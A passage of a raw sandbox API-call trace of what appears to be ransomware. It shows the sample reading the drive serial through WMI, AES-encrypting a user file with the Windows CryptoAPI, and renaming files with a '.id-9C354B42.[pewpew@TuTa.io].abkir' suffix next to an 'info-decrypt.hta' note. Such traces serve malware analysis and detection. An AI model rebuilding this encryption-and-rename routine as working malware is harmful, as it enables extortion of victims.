pszText="\\\\.\\root\\cimv2") returned 0x0 [0162.502] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x6027690) returned 0x0 [0162.502] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027690, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x60331bc) returned 0x0 [0163.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5bf44) returned 0x0 [0163.784] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bf44, pProxy=0x60331bc, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0163.784] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x1 [0163.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5bf64) returned 0x0 [0163.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5bf44) returned 0x0 [0163.784] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bf44, pProxy=0x60331bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0163.785] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x2 [0163.785] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x1 [0163.785] CoTaskMemFree (pv=0xbd4a08) [0163.785] WbemLocator:IUnknown:Release (This=0x6027690) returned 0x0 [0163.785] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5bf64) returned 0x0 [0163.785] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0164.099] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0164.103] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0164.103] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0164.105] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0164.271] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5bec4) returned 0x0 [0164.271] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bec4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0164.271] WbemLocator:IUnknown:Release (This=0xb5bec4) returned 0x3 [0164.271] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0164.271] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0164.271] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5bf4c) returned 0x0 [0164.272] WbemLocator:IRpcOptions:Query (in: This=0xb5bf4c, pPrx=0xb5bf64, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0164.272] WbemLocator:IUnknown:Release (This=0xb5bf4c) returned 0x3 [0164.272] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0164.272] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0164.272] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0164.272] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x60331bc) returned 0x0 [0164.272] WbemLocator:IUnknown:AddRef (This=0x60331bc) returned 0x4 [0164.272] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x3 [0164.272] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x2 [0164.272] SysStringLen (param_1=0x0) returned 0x0 [0164.272] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0164.272] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0164.272] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0164.272] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0164.272] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0164.272] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5bf64) returned 0x0 [0164.272] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x3 [0164.272] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0164.273] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0164.273] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0164.273] IWbemServices:GetObject (in: This=0x60331bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6028978, ppCallResult=0x0) returned 0x0 [0165.011] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0165.011] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0165.011] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0165.011] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3658e04*=0, plFlavor=0x3658e08*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3658e04*=8, plFlavor=0x3658e08*=0) returned 0x0 [0165.011] SysStringByteLen (bstr="9C354B42") returned 0x10 [0165.011] SysStringByteLen (bstr="9C354B42") returned 0x10 [0165.011] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3658e04*=8, plFlavor=0x3658e08*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3658e04*=8, plFlavor=0x3658e08*=0) returned 0x0 [0165.011] SysStringByteLen (bstr="9C354B42") returned 0x10 [0165.011] SysStringByteLen (bstr="9C354B42") returned 0x10 [0165.012] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", lpFilePart=0x0) returned 0xa6 [0165.012] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xc9 [0165.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0165.012] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1da9b2c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0165.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0165.014] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0165.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", lpFilePart=0x0) returned 0xab [0165.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", lpFilePart=0x0) returned 0x96 [0165.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0165.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ba065a0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1ba065a0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1ba065a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0165.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0165.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", lpFilePart=0x0) returned 0xab [0165.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0165.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), fInfoLevelId=0x0, lpFileInformation=0x3659a28 | out: lpFileInformation=0x3659a28*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0165.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0165.019] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", lpFilePart=0x0) returned 0xab [0165.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0165.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0165.019] GetFileType (hFile=0x4d0) returned 0x1 [0165.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0165.020] GetFileType (hFile=0x4d0) returned 0x1 [0165.020] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x560 [0165.020] ReadFile (in: hFile=0x4d0, lpBuffer=0x365a39c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x365a39c*, lpNumberOfBytesRead=0x949ea9c*=0x560, lpOverlapped=0x0) returned 1 [0165.524] CloseHandle (hObject=0x4d0) returned 1 [0165.524] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0xb1eb70) returned 1 [0165.526] CryptGenRandom (in: hProv=0xb1eb70, dwLen=0x10, pbBuffer=0x365b6f0 | out: pbBuffer=0x365b6f0) returned 1 [0167.208] CryptImportKey (in: hProv=0xb1eb70, pbData=0x366526c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7ef90) returned 1 [0167.208] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.208] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.208] CryptDuplicateKey (in: hKey=0xb7ef90, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7fb90) returned 1 [0167.208] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.208] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x4, pbData=0x366534c*=0x1, dwFlags=0x0) returned 1 [0167.208] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x1, pbData=0x3665318, dwFlags=0x0) returned 1 [0167.208] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x366535c*, pdwDataLen=0x949ea68*=0x570, dwBufLen=0x570 | out: pbData=0x366535c*, pdwDataLen=0x949ea68*=0x570) returned 1 [0167.208] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36658f0*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x36658f0*, pdwDataLen=0x949ea70*=0x10) returned 1 [0167.210] CryptDestroyKey (hKey=0xb7ef90) returned 1 [0167.210] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0167.210] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0167.210] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", lpFilePart=0x0) returned 0xab [0167.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0167.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0167.212] GetFileType (hFile=0x208) returned 0x1 [0167.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0167.212] GetFileType (hFile=0x208) returned 0x1 [0167.212] WriteFile (in: hFile=0x208, lpBuffer=0x3666010*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x3666010*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0167.213] CloseHandle (hObject=0x208) returned 1 [0167.214] CoTaskMemAlloc (cb=0x20c) returned 0x66ca998 [0167.214] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66ca998 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0167.214] CoTaskMemFree (pv=0x66ca998) [0167.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0167.214] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0167.214] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0167.214] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0167.215] IUnknown:Release (This=0xb51e34) returned 0x1 [0167.216] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x60275f0) returned 0x0 [0167.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0167.217] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x6030b00) 